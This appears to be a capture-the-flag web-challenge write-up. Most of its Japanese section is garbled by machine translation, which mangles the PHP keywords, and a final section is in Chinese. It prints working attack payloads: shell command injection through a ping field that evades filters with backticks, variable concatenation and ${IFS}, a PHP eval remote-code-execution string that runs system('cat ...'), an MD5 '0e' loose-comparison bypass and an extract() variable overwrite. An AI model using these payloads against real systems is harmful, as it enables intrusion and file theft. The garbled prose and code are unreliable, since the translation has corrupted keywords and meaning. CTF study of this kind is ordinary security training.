$ _GET
出典:
<?PHPの SHOW_SOURCE(__FILE__ )。 含める「のconfig.php」を。 もし(!ISSET($ _GET [ '引数' ])){ ダイス(); } もし($ _GET [ '引数が'] === "give_me_flag" ){ エコー のfile_get_contents($ flag_of_get)。// フラグ } ?>
決定します $ _GET パラメータの受け渡しは、その値が引数である場合 give_me_flag,就会打印 flag
$ _POST
ソース
<?PHPの SHOW_SOURCE(__FILE__ )。 含める「のconfig.php」を。 もし(!ISSET($ _POST [ '引数' ])){ ダイス(); } もし($ _POST [ '引数が'] === "give_me_flag" ){ エコー のfile_get_contents($ flag_of_post)。// フラグ } ?>
フラグを取得し、Firefoxのhackbar質量参加を得て、閉じ同じに追いつくが、POSTをGETになりました
$ _COOKIE
直接アクセスが表示されます:あなたは、任意のプロンプトを表示せず、ソースコードを管理されていません
Etherealの外観:
クッキーがあります:レベル= 0、1つの外観には、
成功裏にフラグを得ました
SVN_Leaked
Lenovoは、SVN SVNのソースコードリーク、ツールのスイープを表示するには
そこSourceLeakHackerForLinux.py
githubのプロジェクトます。https://github.com/Err0rzz/SourceLeakHacker
しようとした様々なパスから始めて、直接アクセス.phpファイルの結果は、フラグを取得することができます
それをリスト
ソースコードを見ると、いくつかの接続管理、およびアクセスを発見!
訪問後、私が見ました
私はこの質問にはナ最初の道路標識の問題に配置する必要がありますどのように感じるか、フラグを開いています。。
change_and_download
ダウンロードしたファイル名がbase64エンコード形式で検索
そして、フラグを見つけるために時間よりも多くしないように、完成したが、この質問は非常にそれを行うのは簡単、そして自閉症である最初の時間を覚えてください!!!
ランダムに推測
あり、ソースコードを見る?デバッグ=真
プラス将来の源があるでしょう
発見extract($_POST),变量覆盖!!
パラメータの受け渡し:秘密鍵= 1&パスワード= 1、フラグを与えるために、
ランダム2をゲス
アクセスindex.php.bak、BAKファイルがダウンロード
<?php require_once 'flag.php'; if(isset($_GET['mash']) and isset($_GET['hash'])){ $res = sanitize($_GET['mash']); $hash = sanitize($_GET['hash']); $secretValue = (rand(5,5555)*555+55555555555); if(($res != false) and ($hash != false)){ if($res.$secretValue == md5($_GET['hash'])){ echo $flag; } else{ echo 'Try Again ! '; } } else{ echo "No!!!"; } } else{ echo "<img src='http://sqlbak.com/blog/wp-content/uploads/2014/02/bak_file.png'>"; } //function function sanitize($var){ $valideChar = str_split('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'); $res = ''; if(isset($var) and !empty($var)){ $tmp = str_split($var); foreach($tmp as $value){ if(in_array($value,$valideChar)){ $res.=$value; } } return $res; } else{ return false; } } ?>
首先 $_GET 传进两个变量,首先会经过 sanitize 进行处理,处理的过程大概就是将传入的字符串分割成一个一个的字符,然后看看在不在 $valideChar 里面,如果在的话就正常返回值
那么正常的输入字符串是没有什么问题的,剩下的就是绕过 MD5 了
只需要 MD5 开头是 0e,PHP 在进行比较运算时,如果遇到了 0exxx 这种字符串,就会将这种字符串解析为科学计数法,因为 0exx 都等于 0,所以让两者相等我们只需再找到一个 MD5 加密后开头为 0exxx 的字符串即可
需要注意的是,第一个参数是不经过 MD5 的,所以需要直接传入 0exxx 开头的,足够 32 位就可以
Ping
命令执行绕过,试了试过滤了一些:一些命令
但是反引号可以执行命令
通过拼接,可以拼接出来:ls 命令
127.0.0.1;`a="l";b="s";c=$a$b;$c`
可以发现 flag 就是下面那一串 flag_ 开头的字符串
在拼接命令来查看:
127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`
针对空格过滤,可以使用:
${IFS}
< (也被过滤了)
$IFS
$IFS$9
来代替,但是考虑到在一串字符串中,所以使用 ${IFS} 来代替空格
Easy RCE
查看源码,发现
但是传值,总是出现问题,在题目的地方发现,可以查看 hint
查看 hint
<?php eval($_GET['name']."!!!"); ?>
后面追加了三个 !!!,所以会有报错
知道问题了,只需要绕过就可以了
使用://就可以把 php 代码注释掉
?name=print_r(scandir('./'));//
?name=print_r(scandir('../../../'));//
?name=system('cat ../../../flag_bfe6335f68be16c1');//